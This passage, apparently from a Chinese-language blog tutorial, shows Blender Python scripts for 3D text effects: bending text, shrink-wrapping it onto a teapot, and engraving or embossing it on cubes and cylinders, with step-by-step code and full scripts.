    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False
    +
    1
    2
    3
    4
    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False
    • SimpleDeform:用于字体弯曲,选择 BendOrigin 选择 Empty 对象,Axis 选择 Y 轴:

    png

    -
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.deform_axis = "Y"
    +
    1
    2
    3
    4
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.deform_axis = "Y"
    • Shrinkwrap:使得文字映射到 teapot 上,Wrap Method 选择 Target Normal ProjectTarget 选择 Teapot 对象,Offset 选择 0.1 m:

    png

    -
    text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
    text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
    text_modifier_shrink_wrap.target = teapot_obj
    text_modifier_shrink_wrap.offset = 0.1
    +
    1
    2
    3
    4
    text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
    text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
    text_modifier_shrink_wrap.target = teapot_obj
    text_modifier_shrink_wrap.offset = 0.1

    png


    完整代码:

    -
    import bpy
    import numpy as np

    # 新建 teapot 对象
    bpy.ops.mesh.primitive_teapot_add()
    teapot_obj = bpy.context.object

    # 新建 text 对象
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    # 居中对齐
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    # 设置位置
    text_obj.location[1] = -2
    text_obj.location[2] = 1.5

    # 设置旋转角
    text_obj.rotation_euler[0] = np.pi / 2

    # 设置挤出举例
    text_obj.data.extrude = 0.1

    # 设置文本内容
    text_obj.data.body = "Hello,\nWorld!"

    # 设置行间距
    text_obj.data.small_caps_scale = 0.75

    # 新建材质
    text_material = bpy.data.materials.new(name="TextMaterial")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

    # 给文本添加材质
    text_obj.data.materials.append(text_material)

    # 新建 empty 对象
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    # 设置 empty 位置
    empty_obj.location[1] = -2
    empty_obj.location[2] = 1.5

    # 设置 empty 旋转角
    empty_obj.rotation_euler[0] = np.pi / 2
    empty_obj.rotation_euler[2] = np.pi / 2

    # 新建 Remesh 的 modifier
    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False

    # 新建 SimpleDeform 的 modifier
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.deform_axis = "Y"

    # 新建 Shrinkwrap 的 modifier
    text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
    text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
    text_modifier_shrink_wrap.target = teapot_obj
    text_modifier_shrink_wrap.offset = 0.1
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    import bpy
    import numpy as np

    # 新建 teapot 对象
    bpy.ops.mesh.primitive_teapot_add()
    teapot_obj = bpy.context.object

    # 新建 text 对象
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    # 居中对齐
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    # 设置位置
    text_obj.location[1] = -2
    text_obj.location[2] = 1.5

    # 设置旋转角
    text_obj.rotation_euler[0] = np.pi / 2

    # 设置挤出举例
    text_obj.data.extrude = 0.1

    # 设置文本内容
    text_obj.data.body = "Hello,\nWorld!"

    # 设置行间距
    text_obj.data.small_caps_scale = 0.75

    # 新建材质
    text_material = bpy.data.materials.new(name="TextMaterial")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

    # 给文本添加材质
    text_obj.data.materials.append(text_material)

    # 新建 empty 对象
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    # 设置 empty 位置
    empty_obj.location[1] = -2
    empty_obj.location[2] = 1.5

    # 设置 empty 旋转角
    empty_obj.rotation_euler[0] = np.pi / 2
    empty_obj.rotation_euler[2] = np.pi / 2

    # 新建 Remesh 的 modifier
    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False

    # 新建 SimpleDeform 的 modifier
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.deform_axis = "Y"

    # 新建 Shrinkwrap 的 modifier
    text_modifier_shrink_wrap = text_obj.modifiers.new(name="Shrinkwrap", type="SHRINKWRAP")
    text_modifier_shrink_wrap.wrap_method = "TARGET_PROJECT"
    text_modifier_shrink_wrap.target = teapot_obj
    text_modifier_shrink_wrap.offset = 0.1

    Engrave & Emboss Text Easily In Blender | Part 3 in Text Effects | Create 3D Text Logo In Blender

    1. 新建一个 Cube,并调整其 Scale

    png

    -
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0] = 1.5
    cube_obj.scale[1] = 2.5
    +
    1
    2
    3
    4
    5
    6
    7
    8
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0] = 1.5
    cube_obj.scale[1] = 2.5
    1. 新建一个 Text,调整其 Transform

    png

    -
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2
    +
    1
    2
    3
    4
    5
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    使其居中对齐:

    png

    -
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2
    +
    1
    2
    3
    4
    5
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    设置文字内容:

    png

    -
    text_obj.data.body = "Hello,\nWorld!"
    +
    1
    text_obj.data.body = "Hello,\nWorld!"
    1. 修改完文字内容后,将其转换成 Mesh,随后文字内容就不能再改变!

    png

    -
    bpy.ops.object.convert(target="MESH")
    +
    1
    bpy.ops.object.convert(target="MESH")
    1. 应用 Decimate 以减少过多的顶点:

    png

    -
    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
    +
    1
    2
    3
    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
    1. Edit Mode 下,选择 Text 对象下的所有顶点,MeshMergeBy Distance

    png

    在对话框中选择 0.01 m。

    png

    -
    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    +
    1
    2
    3
    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)
    1. MeshDeleteLimited Dissolve

    png

    在对话框中选择 Max Angle10°

    png

    -
    bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
    bpy.ops.object.editmode_toggle()
    +
    1
    2
    bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
    bpy.ops.object.editmode_toggle()
    1. Text 添加一个 Solidfy,使其具有高度:

    png

    -
    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2
    +
    1
    2
    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2
    1. Object Mode 下,给 TextCude 使用 Shade Smooth

    png

    png

    png

    -
    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True
    +
    1
    2
    3
    4
    5
    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True
    1. Cude 添加 Boolean,关闭 Text 的显示,形成雕刻效果:

    png

    -
    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    +
    1
    2
    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj
    1. Cude 添加 Bevel,形成斜角效果:

    png

    -
    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True
    +
    1
    2
    3
    4
    5
    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True
    1. Boolean 改为 Union,形成浮雕效果:

    png

    -
    cube_modifier_boolean.operation = "UNION"
    +
    1
    cube_modifier_boolean.operation = "UNION"

    emmmm 如果破了的话好像只能手动处理了。

    png


    完整代码:

    -
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0] = 1.5
    cube_obj.scale[1] = 2.5

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    bpy.ops.object.convert(target="MESH")

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
    bpy.ops.object.editmode_toggle()

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    cube_modifier_boolean.operation = "UNION"
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cube_add()
    cube_obj = bpy.context.object

    cube_obj.scale[0] = 1.5
    cube_obj.scale[1] = 2.5

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[2] = 1.15
    text_obj.rotation_euler[2] = np.pi / 2

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.body = "Hello,\nWorld!"

    bpy.ops.object.convert(target="MESH")

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    bpy.ops.object.editmode_toggle()
    bpy.ops.mesh.select_all(action="SELECT")
    bpy.ops.mesh.remove_doubles(threshold=0.01)

    bpy.ops.mesh.dissolve_limited(angle_limit=np.pi / 18)
    bpy.ops.object.editmode_toggle()

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2

    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cube_obj.data.use_auto_smooth = True

    cube_modifier_boolean = cube_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cube_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    cube_modifier_bevel = cube_obj.modifiers.new(name="Bevel", type="BEVEL")
    cube_modifier_bevel.width = 0.005
    cube_modifier_bevel.segments = 5
    cube_modifier_bevel.use_clamp_overlap = False
    cube_modifier_bevel.harden_normals = True

    cube_modifier_boolean.operation = "UNION"

    Engrave or Carve Text On Curved Surface | Part 4 in Text Effects | Blender Eevee & Cycles

    1. 新建一个圆柱体:

    png

    -
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object
    +
    1
    2
    3
    4
    5
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    png

    -
    cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]
    +
    1
    cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

    png

    -
    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")
    +
    1
    2
    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    png

    -
    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")
    +
    1
    2
    3
    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")
    1. 新建一个文本对象:

    png

    -
    text_obj.location[0] = 1.22
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    +
    1
    2
    3
    4
    5
    text_obj.location[0] = 1.22
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    png

    -
    text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
    text_obj.data.body = "I❤\nYOU"
    -
    text_obj.data.size = 0.9
    text_obj.data.space_line = 0.75
    +
    1
    2
    text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
    text_obj.data.body = "I❤\nYOU"
    +
    1
    2
    text_obj.data.size = 0.9
    text_obj.data.space_line = 0.75

    png

    -
    bpy.ops.object.convert(target="MESH")
    +
    1
    bpy.ops.object.convert(target="MESH")

    png

    -
    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
    +
    1
    2
    3
    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    png

    -
    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2
    +
    1
    2
    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2

    png

    png

    -
    bpy.ops.object.shade_smooth()
    text_obj.data.use_auto_smooth = True
    +
    1
    2
    bpy.ops.object.shade_smooth()
    text_obj.data.use_auto_smooth = True

    png

    -
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2
    +
    1
    2
    3
    4
    5
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    png

    -
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Y"
    +
    1
    2
    3
    4
    5
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Y"

    png

    -
    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True
    +
    1
    2
    3
    4
    5
    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    png

    -
    cylinder_material = bpy.data.materials.new(name="Material")
    cylinder_material.use_nodes = True
    nodes = cylinder_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

    cylinder_obj.data.materials.append(cylinder_material)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    cylinder_material = bpy.data.materials.new(name="Material")
    cylinder_material.use_nodes = True
    nodes = cylinder_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

    cylinder_obj.data.materials.append(cylinder_material)

    完整代码:

    -
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.22
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
    text_obj.data.body = "I❤\nYOU"

    text_obj.data.size = 0.9
    text_obj.data.space_line = 0.75

    bpy.ops.object.convert(target="MESH")

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2


    bpy.ops.object.shade_smooth()
    text_obj.data.use_auto_smooth = True

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Y"

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    cylinder_material = bpy.data.materials.new(name="Material")
    cylinder_material.use_nodes = True
    nodes = cylinder_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

    cylinder_obj.data.materials.append(cylinder_material)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object

    cylinder_obj.scale[0:3] = [1.2, 1.2, 1.2]

    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")

    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.22
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.font = bpy.data.fonts.load("C:\\windows\\Fonts\\seguiemj.ttf")
    text_obj.data.body = "I❤\nYOU"

    text_obj.data.size = 0.9
    text_obj.data.space_line = 0.75

    bpy.ops.object.convert(target="MESH")

    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")

    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.2


    bpy.ops.object.shade_smooth()
    text_obj.data.use_auto_smooth = True

    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2

    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 4
    text_modifier_simple_deform.deform_axis = "Y"

    cylinder_modifier_boolean = cylinder_obj.modifiers.new(name="Boolean", type="BOOLEAN")
    cylinder_modifier_boolean.object = text_obj

    text_obj.hide_viewport = True
    text_obj.hide_render = True

    cylinder_material = bpy.data.materials.new(name="Material")
    cylinder_material.use_nodes = True
    nodes = cylinder_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0.7, 0, 1)

    cylinder_obj.data.materials.append(cylinder_material)

    Emboss Any Text On Curved Surface | Bend Any Text | Part 5 in Text Effects | Blender Eevee & Cycles

    1. 新建一个圆柱体。

    png

    -
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object
    +
    1
    2
    3
    4
    5
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_cylinder_add()
    cylinder_obj = bpy.context.object
    1. 添加 Edgesplit,并应用,分离边:

    png

    -
    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")
    +
    1
    2
    cylinder_modifier_edgesplit = cylinder_obj.modifiers.new(name="EdgeSplit", type="EDGE_SPLIT")
    bpy.ops.object.modifier_apply(modifier="EdgeSplit")
    1. 添加 Subdivision,并应用,使得物体更平滑:

    png

    -
    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")
    +
    1
    2
    3
    cylinder_modifier_subsurf = cylinder_obj.modifiers.new(name="Subdivision", type="SUBSURF")
    cylinder_modifier_subsurf.levels = 2
    bpy.ops.object.modifier_apply(modifier="Subdivision")
    1. 新建一个 Text,调整其参数:

    png

    -
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.1
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    +
    1
    2
    3
    4
    5
    6
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.location[0] = 1.1
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    设置文字内容:

    png

    -
    text_obj.data.body = "Hello,\nWorld!"
    +
    1
    text_obj.data.body = "Hello,\nWorld!"

    png

    -
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    +
    1
    2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    png

    -
    text_obj.data.size = 0.5
    +
    1
    text_obj.data.size = 0.5
    1. 添加一个 Solidify 修改器,挤出 0.15 m:

    png

    -
    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.15
    +
    1
    2
    text_modifier_solidify = text_obj.modifiers.new(name="Solidify", type="SOLIDIFY")
    text_modifier_solidify.thickness = 0.15
    1. Text 转成 Mesh

    png

    -
    bpy.ops.object.convert(target="MESH")
    +
    1
    bpy.ops.object.convert(target="MESH")
    1. Remesh 处理:

    png

    -
    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False
    +
    1
    2
    3
    4
    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
    text_modifier_remesh.octree_depth = 8
    text_modifier_remesh.use_remove_disconnected = False
    1. Decimate处理以减少边的数量:

    png

    -
    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
    +
    1
    2
    3
    text_modifier_decimate = text_obj.modifiers.new(name="Decimate", type="DECIMATE")
    text_modifier_decimate.decimate_type = "DISSOLVE"
    bpy.ops.object.modifier_apply(modifier="Decimate")
    1. 平滑处理:

    png

    png

    png

    -
    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cylinder_obj.data.use_auto_smooth = True
    +
    1
    2
    3
    4
    5
    bpy.ops.object.shade_smooth()

    text_obj.data.use_auto_smooth = True

    cylinder_obj.data.use_auto_smooth = True
    1. 新建一个 Empty,位置和 Text 相同,用于文本弯曲:

    png

    -
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2
    +
    1
    2
    3
    4
    5
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[0:3] = text_obj.location[0:3]
    empty_obj.rotation_euler[0] = np.pi / 2
    1. 设置 SimpleDeform,使 Text 弯曲:

    png

    -
    text_modifier_simple_deform = text_obj.modifiers.new(name="SimpleDeform", type="SIMPLE_DEFORM")
    text_modifier_simple_deform.deform_method = "BEND"
    text_modifier_simple_deform.origin = empty_obj
    text_modifier_simple_deform.angle = - np.pi / 2
    text_modifier_simple_deform.deform_axis = "Y"
    +
    1
    2
    3
    4
    5
